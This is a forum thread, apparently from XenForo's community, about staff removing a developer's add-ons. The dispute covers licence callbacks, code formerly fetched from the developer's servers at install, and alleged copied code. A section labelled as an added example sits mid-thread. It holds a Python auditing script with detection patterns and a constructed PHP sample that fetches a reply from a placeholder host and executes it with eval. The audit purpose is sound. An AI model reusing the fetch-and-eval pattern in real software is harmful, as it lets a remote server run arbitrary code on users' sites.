******* Resource Removal

Status
Not open for further replies.
Could you please explain in brief what exactly was the issue?
1. He had a callback in all his addons whereby on install and uninstall, it would callback to his own servers.
2. Users could not uninstall if they did not have a valid licence, even if they were licensed in the past.
3. ******* could collect data and run arbitrary code on OUR servers if we had his addons installed.

This probably has more information:
https://xenforo.com/community/threads/*******-add-on-cannot-be-uninstalled.82731/

It should also be noted that as far as I'm aware he is not the only developer using such methods. Liam W I believe is another who has begun to remove callbacks. Right now XenForo guidelines state that you must include information about your callbacks upfront in the resource description.

Edit - Apologies if I got any of this wrong. The thread referenced should be your point of info.
 
I never had a problem with callbacks on Install. It was the Uninstall callbacks that were ridiculous. DigitalPoint uses callbacks in his in this manner.
 
@tajhay

As you know, we have updated our products and we have noticed at https://*******.com/threads/notice-of-updates-to-privacy-policy-tos.836/

We just collected Forum URL information to check the license when installing. However, it’s hard to prove this for somebody who does not understand about code. We are in a private talk with Xen staff about this, to ensure the privilege of customers and developers.

We do not go through your data in any way or get information from any customer.

Regards,
 
He had a callback in all his addons whereby on install and uninstall, it would callback to his own servers.

A simple callback was never a problem and is still included in his add-ons. He checks the installation domain with his database and denies install if not licensed. This is what several developers do.

The FORMER problem with him was that he backloaded additional MySQL and/or PHP code from his server during the installation.

But he changed his installation routine after the guidelines were published and currently does not backload any code and also does not use a callback at uninstall. Hopefully it will stay this way.
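The distinction drawn in the post above, between a plain licence callback and backloading code from a remote server, is something a site owner can check for in an add-on's PHP files. The following is an added example, not part of the original thread and not code from any add-on discussed here; the sample PHP and the `licence.example.invalid` host are constructed, and the function names `audit_php` and `audit_tree` are hypothetical.

```python
import re
from pathlib import Path

# PHP built-ins that contact a remote host (the "callback" half).
NETWORK = re.compile(
    r"\b(?:curl_init|curl_exec|fsockopen|stream_socket_client)\s*\("
    r"|\b(?:file_get_contents|fopen)\s*\(\s*['\"]https?://", re.I)
# PHP constructs that execute a string as code (the "backload" half).
EXECUTE = re.compile(r"\b(?:eval|assert|create_function)\s*\(", re.I)
LINE_COMMENT = re.compile(r"^\s*(?://|#|\*|/\*)")

def audit_php(source):
    """Classify one PHP source string by what its code lines can do."""
    net, exe = [], []
    for no, line in enumerate(source.splitlines(), 1):
        if LINE_COMMENT.match(line):
            continue  # skip lines that are only a comment
        if NETWORK.search(line):
            net.append(no)
        if EXECUTE.search(line):
            exe.append(no)
    if net and exe:
        verdict = "backload"      # fetches remotely AND executes strings
    elif net:
        verdict = "callback"      # phones home only
    elif exe:
        verdict = "dynamic-exec"  # executes strings, no visible fetch
    else:
        verdict = "clean"
    return {"network": net, "execute": exe, "verdict": verdict}

def audit_tree(root):
    """Audit every .php file under root; return only the flagged files."""
    flagged = {}
    for path in sorted(Path(root).rglob("*.php")):
        report = audit_php(path.read_text(errors="replace"))
        if report["verdict"] != "clean":
            flagged[str(path)] = report
    return flagged

# Constructed sample: a licence check on install that only phones home.
LICENCE_CHECK = """<?php
// constructed sample: licence check on install
$ch = curl_init('https://licence.example.invalid/check');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$reply = curl_exec($ch);
if ($reply !== 'ok') { throw new Exception('Not licensed'); }
"""
# Constructed sample: the same check, but the server's reply is executed.
BACKLOAD = LICENCE_CHECK + "eval($reply);\n"
```

This is a line-based heuristic: a "clean" verdict does not show an add-on is safe, since obfuscated or indirect calls will not match, so treat the flagged line numbers as places to read by hand.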
 
A simple callback was never a problem and is still included in his add-ons. He checks the installation domain with his database and denies install if not licensed. This is what several developers do.

The FORMER problem with him was that he backloaded additional MySQL and/or PHP code from his server during the installation.

But he changed his installation routine after the guidelines were published and currently does not backload any code and also does not use a callback at uninstall. Hopefully it will stay this way.

Hi HWS,

We would love to say thank you for your explanation. It's hard for us to say directly like you said. Anyway, thank you again for telling for us. We do appreciate and thank god for your knowledge.

Best,
 
We all make mistakes in life.
Everyone deserves a second chance too.
As a client of ******* and XenForo lover I hope the community continues to grow.
I will continue to rely on *******, he's an excellent developer with great products, and I am pretty sure they will do everything possible to restore the confidence of everyone.
My best wishes.
Peace and love to everyone.
 
So I guess this is what all of us, who are not that technical, but own an XF forum and ******* plugin want to know:
  1. Should we uninstall everything by *******? Is this what XF recommends for security reasons?
  2. How can we be sure that everything is removed, since they did some strange things from what I understood?
  3. What happens now, when some essential plugins we used are gone?
I have only one plugin by them, but there is no alternative at the moment on RM. I can only imagine how guys with lots of ******* plugins feel right now.
 
Should we uninstall everything by *******? Is this what XF recommends for security reasons?
That is a decision you need to make. We have no access to most of the add-ons so can't comment on the code.

How can we be sure that everything is removed, since they did some strange things from what I understood?
Post on the specific add-on thread for support with it.

What happens now, when some essential plugins we used are gone?
Commission a developer to make any you require, wait for them to be developed independently, continue using ******* add-ons, or do without.
 
I just want to refer back to my previous post:

https://xenforo.com/community/threads/*******-resource-removal.92263/page-2#post-892714

The issues leading to our actions were not security related; the major issues did not even involve code. However, as we do not audit resources in general (and we have no access to the majority of paid ones), we could not say that any given add-on is "safe". It's unlikely that someone would intentionally put dangerous code in but it's simply an unknown.
 
As a follow-up question to Mike's previous post, I'm curious if *******'s products did or did not contain stolen code from similar resources from other authors? The question is not directed to Mike who has already indicated they are not aware of what is inside of his code, rather other authors who feel he has infringed on their products. This inquiry has nothing to do with starting trouble, I simply want to know if I should remove his remaining products as a matter of ethics vs security?
 
That has already been discussed here: https://xenforo.com/community/threa...nship-with-vxf-vn-and-copyright-issues.91524/
 
That has already been discussed here: https://xenforo.com/community/threa...nship-with-vxf-vn-and-copyright-issues.91524/
So no definitive answer? I can't read code so the proof isn't in the pudding. All I can make out of that thread is nine pages of back-and-forth. I suppose I'll have another go at rereading it again when I have more time later.
 
So no definitive answer? I can't read code so the proof isn't in the pudding. All I can make out of that thread is nine pages of back-and-forth. I suppose I'll have another go at rereading it again when I have more time later.

The conclusion was that lots of code had been copied and there seemed to be lots of evidence to that effect.

As long as this comes down to dubious copyright practices rather than malicious coding then it's not as worrying for people as it could be.
 
It relates to a combination of factors, as mentioned in the first post and reiterated by Mike above.
 
It relates to a combination of factors, as mentioned in the first post and reiterated by Mike above.

"The issues leading to our actions were not security related" sounds pretty clear cut. I know absence of proof isn't proof of absence, etc but it's not like you found a massive security issue that should worry people (although that doesn't mean his, or anyone's, code might not contain one).
 
As stated, we are unable to say whether there are or are not security related issues with the code, for the simple reason that we do not have access to it and have not audited it.
 
Much appreciated. I had initially intended to keep *******'s products on my site until they required updating, however I don't want to be regarded as supporting piracy. So as a matter of ethics I think they just need to go.
 
As stated, we are unable to say whether there are or are not security related issues with the code, for the simple reason that we do not have access to it and have not audited it.

That's surely the same as with anyone's code though and therefore seems irrelevant to the discussion. What would be a worry is if you had looked at it and found a security concern but Mike confirmed that's not the case.
 